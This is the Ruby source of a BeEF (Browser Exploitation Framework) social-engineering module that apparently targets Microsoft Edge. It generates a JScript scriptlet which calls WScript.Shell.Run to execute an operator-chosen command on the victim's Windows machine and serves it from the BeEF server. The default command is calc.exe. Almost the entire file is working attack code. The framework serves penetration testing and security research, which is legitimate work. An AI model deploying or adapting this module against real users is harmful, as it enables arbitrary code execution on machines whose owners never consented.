beef/modules/social_engineering/edge_wscript_wsh_injection/module.rb

#
# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Edge_wscript_wsh_injection < BeEF::Core::Command

  def pre_send
    payload = ''
    @datastore.each do |input|
      if input['name'] == 'payload'
        payload = input['value']
      end
    end

    rand_str = rand(32**10).to_s(32)

    script = <<-EOF
<?XML version="1.0"?>                                                                                           
  <scriptlet>

  <registration
    description="#{rand_str}"
    progid="#{rand_str}"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
  >
  </registration>

  <script language="JScript">
  <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}");
  ]]>
  </script>

  </scriptlet>
EOF

    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
      {
        'Content-Type' => 'text/html'
      },
      script,
      "/#{@command_id}/index.html",
      -1
    )
  end

  def self.options
    return [
      {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"}
    ]
  end

  def post_execute
    save({'result' => @datastore['result']})
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")
  end
end